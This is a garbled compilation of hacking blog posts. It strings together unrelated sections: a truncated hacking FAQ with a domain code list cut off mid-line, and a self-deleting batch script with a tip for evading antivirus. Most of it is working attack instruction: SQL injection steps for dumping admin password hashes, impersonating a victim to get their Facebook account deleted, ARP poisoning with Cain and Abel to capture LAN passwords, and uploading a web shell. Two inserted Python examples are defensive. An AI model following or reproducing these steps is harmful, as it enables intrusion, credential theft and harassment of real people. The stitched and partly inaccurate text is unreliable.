first get a hacking tool no need to worry where to find just go to http://www.youtube.com and search "Runescape Hacker" or "Runescape Hacker Download Link"
you will get the downloading link in comments zone
now you have downloaded the hacker tool but -Don't open the Runescape Hacker Tool, It may be Backd00red Instead place it in a Safe area!
Download and install Hex Workshop. Don't ask for a link; Google is your friend.
Now right-click on the tool. You will see "Edit this with HexWorkshop". Click it.
You will see a mess of words, letters and symbols. Don't worry and don't get confused; believe me, it's easy to do!
Now press Ctrl+F. A box will appear.
-Now Before start Finding Anything Make sure you change the "Hex" to "String" value.
-Now Enter "Gmail" to the Box and Hit "Find".
-You will Get Popping Up a Black area. Don't touch it. Instead see on your Right for the Texts.
-Copy the Highlighted text and Paste it in a Text document (Newly Created).
-Remove the [.]>DOTs and You will see The Email ID + the Passwd.
SQL injection is an attack in which input sent to a website is interpreted as part of the SQL query the site runs against its database.
Step 1
First we will find a site which is vulnerable to SQLi.
So surf the site till you get to a URL which looks like this:
www . prateek . com/articles/index.php?id=213
By this I mean a URL ending with something like this: "php?id=213"
Now to check whether the site is vulnerable or not, we add a ' sign at the end of the URL.
Example = > www . prateek . com/articles/index.php?id=213'
If we get an error like this "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1"
or similar it means the site is vulnerable to SQLI.
Ok so now we will proceed to the next step
Step 2
Finding the number of columns , now we will find the number of columns with the ORDER BY command.
Example = >www . prateek . com/articles/index.php?id=213 order by 10--
So here we added the number 10, assuming that there are 10 columns.
If the site does not have 10 columns it will give an error "Unknown column '10' in 'order clause'"
OK, this means that the number of columns is less than 10. So we continue to test by decreasing the number.
Example ==> www . prateek . com/articles/index.php?id=213 order by 9--
www . prateek . com/articles/index.php?id=213 order by 8--
www . prateek . com/articles/index.php?id=213 order by 7--
www . prateek . com/articles/index.php?id=213 order by 6--
www . prateek . com/articles/index.php?id=213 order by 5--
Step 3
Now when we test it for 5 columns it does not give an error and if we test it for 6 it gives an error which means that the number of columns is 5.
So now as we know that there are 5 columns we will now use the UNION ALL command.
EXAMPLE = >
www . prateek . com/articles/index.php?id=213 union all select 1,2,3,4,5--
As there were 5 columns we selected all the 5 columns.
When we execute this URL then on the page there will be number(s) displayed.
Like 2 or 3 or 4 etc. (This will not be greater than the number of columns)
Step 4
Now the number which appeared we have to remember it as we will use it in the next step.
Let us assume that number 3 appeared.
So now we will check the version of MYSQL with the help of this number
Example - www . prateek . com/articles/index.php?id=213 union all select 1,2,@@version,4,5--
We used the @@version command to find out the version being used.
We replaced the number 3 (as we had got it in the last step) with @@version
Now after executing this the version number will be displayed,
like => 5.0.51a-community
Now as the version is above 5 it's fine.
Step 5
Now we will find the names of columns and tables.
This will be done by -:
Example URL => www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=databse()--
After executing this , names of tables will be displayed.
It may be anything.
Note them down. (choose names having admin, username, user etc. in them)
Now we will find the names of columns
Example URL = > www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema=databse()--
After executing this , names of columns will be displayed.
It may be anything.
Note them down. (choose names having password, username, pass etc. in them)
you might think what happens when you don't see a column like username or password?
then you have to do a little guessing.
Step 6
Now we will move further.
And place the names of columns and tables we noted down in the URL
Example = > www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(username,0x3a,password),4,5 from admin--
In the above URL, username is the column named username or user or admin etc. Similarly, password is also a column, and the end part, i.e. from admin, is the TABLE.
That's it: execute the URL and you will get the password as a HASH (most probably, but if you are lucky you can even get it normally).
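Every step above depends on the id parameter being pasted into the SQL text. The following is an added example, not code from the original post: it runs the id values from Steps 1-3 against a string-built query and against an allow-listed, parameterized one. It uses an in-memory SQLite database as a stand-in for the MySQL back end, and the table, data and function names are assumptions.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the site's database (names are assumptions)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER, title TEXT, body TEXT, author TEXT, created TEXT);
        INSERT INTO articles VALUES (213, 'Hello', 'First post', 'editor', '2010-01-01');
    """)
    return db

def get_article_vulnerable(db, raw_id):
    # The flaw every step above depends on: the id parameter becomes SQL text.
    return db.execute("SELECT * FROM articles WHERE id=" + raw_id).fetchall()

def get_article_safe(db, raw_id):
    # Allow-list first: an article id is a short run of ASCII digits, nothing else.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 10):
        raise ValueError("id must be an integer")
    # Bound parameter: the value is passed separately and is never parsed as SQL.
    return db.execute("SELECT * FROM articles WHERE id=?", (int(raw_id),)).fetchall()

def outcome(fetch, db, raw_id):
    """Classify what the client would observe for one request."""
    try:
        return ("rows", len(fetch(db, raw_id)))
    except sqlite3.Error:
        # In production: log server-side and return a generic error page.
        # Echoing the database message is what confirms the flaw in Step 1.
        return ("sql-error", 0)
    except ValueError:
        return ("rejected", 0)

# The id values from Steps 1-3 of the page, plus one legitimate request
PAGE_INPUTS = ["213", "213'", "213 order by 10--", "213 order by 5--",
               "213 union all select 1,2,3,4,5--"]

def compare():
    """Map each input to (vulnerable outcome, safe outcome)."""
    db = make_db()
    return {raw: (outcome(get_article_vulnerable, db, raw),
                  outcome(get_article_safe, db, raw)) for raw in PAGE_INPUTS}

if __name__ == "__main__":
    for raw, (vuln, safe) in compare().items():
        print(f"{raw!r:40} vulnerable={vuln} safe={safe}")
```

With the safe version only the plain "213" request returns a row; the quote, ORDER BY and UNION inputs never reach the database.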
Here is a method to delete any facebook profile or account. It works 100%. But its just for educational purpose. So don't use it on anyone. Once Deleted Profile can never be recovered. Use wisely.
WHAT ALL U NEED ?
1. Victim's profile link ( you can get it easily )
2. His/Her Email which he/she uses to sign in
3. His/Her birth date which he/she has used in the profile
4. Make an Email ID on gmail or yahoo with the first name and last name same as on victim's facebook profile.
2. Enter details. In the place of ' email address where you can be contacted ' enter the fake email u created.
3. you will get a mail on that ID in which facebook people will ask your problem. Reply to them that you are XYZ( victim's name ) and you cant access your facebook account. Also you have lost access to your Email Address associated with the account. You dont know what to do now. The hacker is coming online regularly and using your account. If the victim is a girl also write ' I am a girl and it poses threat to my social life ' and write anything you want that could make them take action. ( no need though in 100 % cases they delete the account )
4. After 2-3 days you will get a reply. They will again ask you whether you have access to your associated Email or not. Reply to them that you still don't have access to it. And repeat what all you wrote in first mail.
5. Next Day or Same Day you will get an Email that your account is disabled.
Ans. Hacking is the art of breaking into computers to gain knowledge that our society has hidden from us.
Hacking is illegal and the government spends lots of money each year to have hackers arrested... when they
should be spending the money on more important issues.
Q. What is a shadowed password?
A. A shadowed password is a cover for the real password file.
It shows that the real password is hidden somewhere else.
Q. How do I crack shadowed passwords?
Ans. Cracking a shadowed password file is impossible.
Assuming that you got the password file via anonymous ftp.
You should try connecting to port 25 and doing the sendmail bug.
Q. What is the difference between an encrypted password and a shadowed password?
Ans. An encrypted password is just the real password scrambled and changed.
It can be cracked with a password cracker and a word file.
A shadowed password hides the encrypted password somewhere else other than the etc. dir.
Q. Where is the password file located?
Ans. The password file is located in the etc/passwd dir.
You can get into the etc dir by logging on to the domain via anonymous ftp.
Q. What is an exploit?
A. An exploit is something that exploits unix or another kind of OS.
You usually use exploits to gain root or high access to a system. They can prove to be very handy
Q. What are some basic telnet commands?
A. Below is a list of common telnet commands.
Command ------- Function
access -------- Telnet account
c ------------- Connect to a host
cont ---------- Continue
d ------------- Disconnect
full ---------- Network echo
Q. What is DNIC?
Ans. A DNIC says which network connects to the telnet you are using.
Q. What is NUA?
Ans. The NUA is the address of the computer on telnet.
Q. What is a VAX/VMS?
Ans. A VAX/VMS is Digital Equipment's major computer line. Its proprietary operating system is known as VMS.
Q. What is telnet?
A. Telnet is a program which lets you log in to other computers on the net.
Q. What is an anonymous remailer?
A. An anonymous remailer is a system on the Internet that allows you to send e-mail
anonymously or post messages to Usenet anonymously. You apply for an anonymous ID at the remailer site.
Then, when you send a message to the remailer, it sends it out from your anonymous ID at the remailer.
No one reading the post will know your real account name or host name. If someone sends a message to your
anonymous ID, it will be forwarded to your real account by the remailer.
Q. What is tcp/ip?
A. Tcp/ip is the system networks use to communicate with each other.
It stands for Transmission Control Protocol/Internet Protocol.
Q. What is a virus?
A. A Virus is a program which reproduces itself. It may attach itself to other programs,
it may create copies of itself. It may damage or corrupt data, change data,
or degrade the performance of your system by utilizing resources such as memory or disk space.
Some Virus scanners detect some Viruses. No Virus scanners detect all Viruses.
Virus scanners will work for a while but people are always creating virii that will beat them.
Q. What is a trojan?
A. A trojan is a program which does an unauthorized function, hidden inside an authorized program.
It does something other than it claims to do, usually something malicious, and it is intended by the
author to do whatever it does. If it is not intentional, it is called a bug.
Q. What is a worm?
Ans. Worms are programs that copy themselves over and over, using up space and slowing down the system.
They are self contained and use the networks to spread, in much the same way that Viruses use files to spread.
Some people say the solution to Viruses and worms is to just not have any files or networks.
Q. What do I need to become a hacker?
A. You should start off with a good scanner, some dialups, a telnet client, and some knowledge of hacking.
Those are the basic things that you will need. If you are serious about hacking then you should get Unix,
or Linux (smaller, free version of unix).
Q. What are the domain codes?
A. Below is the current list of domain codes.
AD - Andorra
AE - United Arab Emirates
AF - Afghanistan
AG - Antigua and Barbuda
AI - Anguilla
AL - Albania
AM - Armenia
AN - Netherlands Antilles
AO - Angola
AQ - Antarctica
AR - Argentina
AS - American Samoa
AT - Austria
AU - Australia
AW - Aruba
AZ - Azerbaijan
BA - Bosnia-Herzegovina
BB - Barbados
BD - Bangladesh
BE - Belgium
BF - Burkina Faso
BG - Bulgaria
BH - Bahrain
BI - Burundi
BJ - Benin
BM - Bermuda
BN - Brunei Darussalam
BO - Bolivia
BR - Brazil
BS - Bahamas
BT - Bhutan
BV - Bouvet Island
BW - Botswana
BY - Belarus
BZ - Belize
CA - Canada
CC - Cocos (Keeling) Islands
CF - Central African Republic
CG - Congo
CH - Switzerland
CI - Ivory Coast
CK - Cook Islands
CL - Chile
CM - Cameroon
CN - China
CO - Colombia
CR - Costa Rica
CS - Czechoslovakia
CU - Cuba
CV - Cape Verde
CX - Christmas Island
CY - Cyprus
CZ - Czech Republic
DE - Germany
DJ - Djibouti
DK - Denmark
DM - Dominica
DO - Dominican Republic
DZ - Algeria
EC - Ecuador
EE - Estonia
EG - Egypt
EH - Western Sahara
ES - Spain
ET - Ethiopia
FI - Finland
FJ - Fiji
FK - Falkland Islands (Malvinas)
FM - Micronesia
FO - Faroe Islands
FR - France
FX - France (European Territory)
GA - Gabon
GB - Great Britain (UK)
GD - Grenada
GE - Georgia
GH - Ghana
GI - Gibraltar
GL - Greenland
GP - Guadeloupe (French)
GQ - Equatorial Guinea
GF - Guyana (French)
GM - Gambia
GN - Guinea
GR - Greece
GT - Guatemala
GU - Guam (US)
GW - Guinea Bissau
GY - Guyana
HK - Hong Kong
HM - Heard and McDonald Islands
HN - Honduras
HR - Croatia
HT - Haiti
HU - Hungary
ID - Indonesia
IE - Ireland
IL - Israel
IN - India
IO - British Indian Ocean Territory
IQ - Iraq
IR - Iran
IS - Iceland
IT - Italy
JM - Jamaica
JO - Jordan
JP - Japan
KE - Kenya
KG - Kyrgyzstan
KH - Cambodia
KI - Kiribati
KM - Comoros
KN - Saint Kitts Nevis Anguilla
KP - North Korea
KR - South Korea
KW - Kuwait
KY - Cayman Islands
KZ - Kazakhstan
LA - Laos
LB - Lebanon
LC - Saint Lucia
LI - Liechtenstein
LK - Sri Lanka
LR - Liberia
LS - Lesotho
LT - Lithuania
LU - Luxembourg
LV - Latvia
LY - Libya
MA - Morocco
MC - Monaco
MD - Moldavia
MG - Madagascar
MH - Marshall Islands
ML - Mali
MM - Myanmar
MN - Mongolia
MO - Macau
MP - Northern Mariana Islands
MQ - Martinique (French)
MR - Mauritania
MS - Montserrat
MT - Malta
MU - Mauritius
MV - Maldives
MW - Malawi
MX - Mexico
MY - Malaysia
MZ - Mozambique
NA - Namibia
NC - New Caledonia (French)
NE - Niger
NF - Norfolk Island
NG - Nigeria
NI - Nicaragua
NL - Netherlands
NO - Norway
NP - Nepal
NR - Nauru
NT - Neutral Zone
NU - Niue
NZ - New Zealand
OM - Oman
PA - Panama
PE - Peru
PF - Polynesia (French)
PG - Papua New
This is another tool that is favored in extracting or recovering passwords. Note very carefully, Cain and Abel is a "PASSWORD RECOVERY" tool, use it carefully.
(THIS POST IS FOR EDUCATIONAL USE ONLY)
Before I start, there are a few requirements.
Should have a switched LAN. (Most ISPs other than BSNL provide broadband via LAN, e.g. SIFY, HATHWAY, local Cable internet connections)
Any Microsoft Windows Operating System.
If you are not sure about being on a switched network, continue the steps, until you find out.
Download and install Cain and Abel from the link given above.
Start Cain and Abel (requires admin privileges in Vista), go to the sniffer tab, click on the configure menu, select your NIC, check 'start sniffer on startup', press 'OK'.
Click on the 'Start / Stop Sniffer' (the 2nd) button on the toolbar. Now click the blue '+' (plus) sign (this is the 7th button on the toolbar). Check 'All Tests' and click 'OK'.
After the scan is complete, if you are on a switched network then, you must be able to see many IP and MAC addresses in this pane. If you don't see any IP other than your own, probably you are not on a switched network.
Notice the tabs on the bottom, HOSTS, APR, Routing, Passwords, and VoIP. You are currently on the HOSTS tab, select the APR tab click on the 'top pane' and click the 'blue +' (7th on toolbar).
Now you will again see the IP & MAC address (in the left pane) you saw in Step 5. From this list, select your 'Gateway IP', (this will mostly be something like 192.xxx.xxx.1 or 10.xxx.xxx.1 etc; check your network properties for more info on gateway.) after selecting your 'Gateway IP Address' (now some IP will appear on the right); drag and select all the entries in the right pane, and click 'OK'.
Now click on the 'Start/Stop APR' (the 3rd) button on the toolbar. You will see 'HALF ROUTING' and 'FULL ROUTING' entries in the lower pane.
Now go to the Passwords tab on the bottom. Slowly you will see passwords appearing in this section; most will be under HTTP.
The password section gives you full details on the capture, including Username, password, URL, etc. Any person who was online during the time you completed Steps 3 – 5, will be affected, and you will have access to their passwords.
Beware: What this program does is send all the traffic through your computer, so the LAN speeds slow down drastically. On my home network, LAN transfer speeds reduced from 10MB/s to 100Kb/s in 10 minutes.
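Because the poisoning described above reroutes a host's gateway traffic through another machine, it is visible in that host's ARP cache. The following is an added example, not part of the original post: it parses Windows `arp -a` output and flags a gateway entry whose MAC has changed or is shared with another host. The sample table, addresses and function names are constructed for illustration.

```python
import re

# One row of Windows `arp -a` output: IP, dash-separated MAC, entry type
ROW = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+((?:[0-9a-f]{2}-){5}[0-9a-f]{2})\s+(\w+)",
    re.IGNORECASE,
)

def parse_arp_table(text):
    """Return {ip: mac} for the dynamic (learned) entries only.

    Static rows are skipped: broadcast and multicast addresses legitimately
    share MACs and would produce false positives.
    """
    table = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m and m.group(3).lower() == "dynamic":
            table[m.group(1)] = m.group(2).lower()
    return table

def arp_findings(text, gateway_ip, baseline_gateway_mac=None):
    """Flag the two cache states that ARP poisoning of the gateway produces."""
    table = parse_arp_table(text)
    findings = []
    gw_mac = table.get(gateway_ip)
    if gw_mac is None:
        return findings
    # 1) The gateway's MAC differs from the one recorded on a known-good LAN.
    if baseline_gateway_mac and gw_mac != baseline_gateway_mac.lower():
        findings.append(("gateway-mac-changed", gw_mac))
    # 2) Another host's IP resolves to the same MAC as the gateway: that host
    #    is answering ARP for the gateway and relaying its traffic.
    others = sorted(ip for ip, mac in table.items()
                    if mac == gw_mac and ip != gateway_ip)
    if others:
        findings.append(("gateway-mac-shared", gw_mac, others))
    return findings

# Constructed sample: a workstation's cache while 192.168.1.40 answers for the gateway
POISONED = """
Interface: 192.168.1.23 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-1a-2b-3c-4d-5e     dynamic
  192.168.1.40          00-1a-2b-3c-4d-5e     dynamic
  192.168.1.55          a4-5e-60-11-22-33     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""

if __name__ == "__main__":
    for finding in arp_findings(POISONED, "192.168.1.1", "c8-3a-35-aa-bb-cc"):
        print(finding)
```

A router that legitimately holds several addresses on one interface will also trigger the shared-MAC finding, so compare against a recorded baseline before acting. Dynamic ARP Inspection on the switch and HTTPS for logins limit what such rerouting can capture.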
Today we shall see how to get admins pass in mybb. What you need is to upload a shell; I've used an r57 shell here (which is the tricky part and you need to do that).
Many people upload shells but little do they know how to use it effectively.
Batch is great for beginners. Simple commands, can't get easier than that.
These are some useful tricks that can help you improve your batch programming.
Here are some of my personal tricks.
1. Password protect, Invalid Passwords= Self destruction
@echo off
cd /d "%systemroot%"
color 0a
cls
echo.
echo.
set /p confirmation= Enter Security Password: 
rem Quotes keep the comparison valid when the input is empty or contains spaces
if "%confirmation%"=="Insection" goto confirmed
if "%confirmation%"=="selfdestruct" goto selfdestruct
rem Wrong password: count earlier failures by the marker files left behind
if exist "%systemroot%\death3.666" goto selfdestruct
if exist "%systemroot%\death2.666" goto say3
if exist "%systemroot%\death1.666" goto say2
:say1
rem %~f0 is the full path of this script, still valid after the cd above
copy "%~f0" "%systemroot%\death1.666" >nul
attrib +r +h "%systemroot%\*.666" >nul
msg * Incorrect Password, File self destructs after 3 more incorrect passwords.
exit
:say2
copy "%~f0" "%systemroot%\death2.666" >nul
attrib +r +h "%systemroot%\*.666" >nul
msg * Incorrect Password, File self destructs after 2 more incorrect passwords.
exit
:say3
copy "%~f0" "%systemroot%\death3.666" >nul
attrib +r +h "%systemroot%\*.666" >nul
msg * Incorrect Password, File self destructs after 1 more incorrect passwords.
exit
:selfdestruct
msg * File Self Destructed -Too many incorrect Passwords
del "%~f0" /f /q >nul
exit
:confirmed
rem YOUR CODE GOES HERE
As you can see, when the bat file is first opened it will ask for a password.
As you can see when the correct password is entered, it takes you to :confirmed and that's where you place your codes.
If an invalid password is entered the bat creates Hidden files which it uses to remember how many times an invalid password was entered in %systemroot%/WINDOWS and informs you of an invalid password entry.
So 1 invalid password = 1 log file
3 log files = your bat deleting itself.
2. EICAR STRING
By simply putting this in the beginning of your bat, you may fool some older AV's